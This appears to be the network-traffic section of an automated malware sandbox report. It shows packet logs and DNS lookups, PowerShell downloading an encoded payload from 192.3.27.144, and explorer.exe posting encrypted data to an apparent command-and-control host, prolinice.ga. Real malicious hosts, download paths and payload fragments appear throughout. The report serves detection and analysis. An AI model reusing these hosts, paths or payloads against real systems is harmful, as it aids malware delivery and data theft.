Jan 9, 2025 08:02:45.830108881 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830120087 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830132961 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830152035 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830158949 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.830180883 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.830508947 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830528975 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830555916 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.830585957 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830595970 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830621958 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.830652952 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830692053 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.830699921 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830710888 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830739021 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.830773115 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830784082 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.830820084 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.831053972 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831064939 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831077099 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831100941 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.831193924 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831204891 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831221104 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831240892 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.831268072 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.831332922 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831352949 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831388950 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.831388950 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831450939 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831463099 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831499100 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.831526995 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831568003 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831571102 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.831579924 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831613064 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.831738949 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831751108 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831785917 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.831804991 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831826925 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.831922054 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.889981985 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.889995098 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.890006065 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.890116930 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.890141964 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.890162945 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.890178919 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.890189886 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.890223980 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.890280008 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.890316963 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.891289949 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.901606083 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.901617050 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.901671886 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.915180922 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.915232897 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.915244102 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.915275097 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.915304899 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.915323973 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.915344000 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.915421963 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.915488005 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.921286106 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.921297073 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.921308041 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.921344042 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.921408892 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.921447992 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.921488047 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.921552896 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.921564102 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.921576023 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.921591997 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.921602011 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.921637058 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.921658039 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.921694994 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.960149050 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.960174084 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.960186005 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.960213900 CET  49913  80     192.168.2.7    46.173.214.14
Jan 9, 2025 08:02:45.960293055 CET  80     49913  46.173.214.14  192.168.2.7
Jan 9, 2025 08:02:45.960304976 CET  80     49913  46.173.214.14  192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.960349083 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.960349083 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.960359097 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.960406065 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.960416079 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.960454941 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.960500956 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.960664034 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.960671902 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.960711002 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.960738897 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.960748911 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.960781097 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.960968018 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.960977077 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.960987091 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961016893 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.961040020 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.961045980 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961150885 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961199999 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961210966 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961241007 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.961263895 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.961263895 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961287975 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961325884 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.961373091 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961383104 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961412907 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.961591005 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961638927 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961690903 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961730957 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.961747885 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961759090 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961793900 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.961805105 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961831093 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961843014 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.961920023 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961930037 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.961972952 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.962142944 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962188005 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.962197065 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962207079 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962229967 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962260962 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.962336063 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962346077 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962387085 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.962461948 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962471008 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962506056 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.962649107 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962704897 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962750912 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.962760925 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962801933 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.962822914 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962832928 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962882996 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.962883949 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962894917 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962907076 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.962929964 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.963021040 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963042974 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963059902 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.963304996 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963331938 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963344097 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963345051 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.963356018 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963376045 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.963380098 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963504076 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963512897 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963531971 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.963548899 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.963692904 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963701963 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963782072 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.963840961 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963860989 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963871956 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963906050 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.963937044 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.963977098 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.964039087 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.964344978 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.964354038 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.964395046 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:45.980328083 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:45.980628014 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:46.043142080 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043155909 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043219090 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:46.043420076 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043437004 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043457031 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043488979 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:46.043503046 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043541908 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:46.043565035 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043576002 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043586969 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043613911 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:46.043684006 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043723106 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:46.043752909 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043765068 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043775082 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043798923 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:46.043929100 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043942928 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043963909 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.043977976 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:46.043983936 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.044002056 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:46.044182062 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.044193029 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.044203997 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.044214964 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.044225931 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.044229031 CET4991380192.168.2.746.173.214.14
                                                                                                                                                    Jan 9, 2025 08:02:46.044239044 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.044251919 CET804991346.173.214.14192.168.2.7
                                                                                                                                                    Jan 9, 2025 08:02:46.044255018 CET4991380192.168.2.746.173.214.14
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 9, 2025 08:02:00.243468046 CET | 62856 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 08:02:44.243079901 CET | 49207 | 53 | 192.168.2.7 | 1.1.1.1
Jan 9, 2025 08:02:44.432193995 CET | 53 | 49207 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 9, 2025 08:02:00.243468046 CET | 192.168.2.7 | 1.1.1.1 | 0xf47e | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false
Jan 9, 2025 08:02:44.243079901 CET | 192.168.2.7 | 1.1.1.1 | 0x9a27 | Standard query (0) | prolinice.ga | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 9, 2025 08:02:00.250449896 CET | 1.1.1.1 | 192.168.2.7 | 0xf47e | No error (0) | res.cloudinary.com | resc.cloudinary.com.cdn.cloudflare.net | (none) | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 08:02:44.432193995 CET | 1.1.1.1 | 192.168.2.7 | 0x9a27 | No error (0) | prolinice.ga | (none) | 46.173.214.14 | A (IP address) | IN (0x0001) | false
• 192.3.27.144
• xeoxlfalojah.net
  • prolinice.ga
• gsfmhaothvg.com
• yilwfgipaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49763 | 192.3.27.144 | 80 | 5128 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 08:02:19.612373114 CET | 83 | OUT | GET /250/evenmegoodfor.txt HTTP/1.1
    Host: 192.3.27.144
    Connection: Keep-Alive
Jan 9, 2025 08:02:20.096890926 CET | 1236 | IN | HTTP/1.1 200 OK
    Date: Thu, 09 Jan 2025 07:02:20 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
    Last-Modified: Tue, 07 Jan 2025 16:11:41 GMT
    ETag: "c558-62b2000228871"
    Accept-Ranges: bytes
    Content-Length: 50520
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/plain
                                                                                                                                                    Jan 9, 2025 08:02:20.097317934 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    Jan 9, 2025 08:02:20.101871967 CET1236INData Raw: 73 6b 63 62 79 6a 54 57 6a 2f 31 32 5a 4e 6d 58 62 68 31 59 73 68 33 30 69 64 52 74 52 55 35 46 2b 69 54 49 56 30 39 6b 39 79 6c 78 5a 47 2f 6d 6c 77 59 48 74 63 57 43 62 31 53 4e 53 45 41 46 39 4b 5a 2f 47 38 74 45 6a 62 5a 5a 64 4d 62 6c 37 41
                                                                                                                                                    Data Ascii: skcbyjTWj/12ZNmXbh1Ysh30idRtRU5F+iTIV09k9ylxZG/mlwYHtcWCb1SNSEAF9KZ/G8tEjbZZdMbl7AWQdwSLj0BuVkpll8ZFsMyab06YrM4KiWQHwU2K25QJN0VLFG0SkHbJjNxWVN+UbCRZ3D02qZ108LzPpQZbLUCHlMBOt2lynKxVufSLRGxuTWNFfK1YlKywbvtIRcKVbsCgU0j5aVAPpNkjnFRTQslVjD1GB7lS1Ig


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49913 | 46.173.214.14 | 80 | 4056 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 08:02:44.438400030 CET | 278 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xeoxlfalojah.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 310
Host: prolinice.ga
Jan 9, 2025 08:02:44.438425064 CET | 310 | OUT | Data Raw: 6e e2 90 f9 c0 49 85 11 6a 63 b4 11 4c 51 88 8e af 25 ed 21 47 fd bd 98 f5 ec 7a 65 d6 49 36 01 37 b1 eb c4 0f d1 82 d7 66 bb c4 f6 87 a1 2b 21 81 22 0e 03 a1 68 6d e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 42 d8 fa cc
Data Ascii: nIjcLQ%!GzeI67f+!"hm6hEv:RY;PLB3rh9n7 n\$yU^erE^}I&cKVT`uVv,/]O&,~e' A`QMknn0Xe]MPLH
Jan 9, 2025 08:02:45.418756008 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Thu, 09 Jan 2025 07:02:45 GMT
Server: Apache/2.4.59 (Debian)
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
                                                                                                                                                    Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a [TRUNCATED]
                                                                                                                                                    Data Ascii: 52d53_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJy/ym!Q]K,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/oc$7;KC?iT6cTD/m#R|~Yr [TRUNCATED]
                                                                                                                                                    Jan 9, 2025 08:02:45.418781042 CET1236INData Raw: 50 60 c1 62 4e 47 09 99 34 01 6f 12 1a 46 5a dc 19 8a 32 8e 3a 4a 46 78 d9 bd c0 47 06 63 a2 e7 43 6c 5f a3 5c e6 3f 2b e2 a7 6d 88 36 d1 ab 7a 33 cd e9 51 55 b8 03 fb 2e 0d 79 6a 86 6c 78 60 5a 8e 07 2c 38 79 4f 36 32 6e 72 7e f0 72 29 40 6c 3b
                                                                                                                                                    Data Ascii: P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmBH,c:l%TM007#1<?ye-gtgcwmV`&$E^
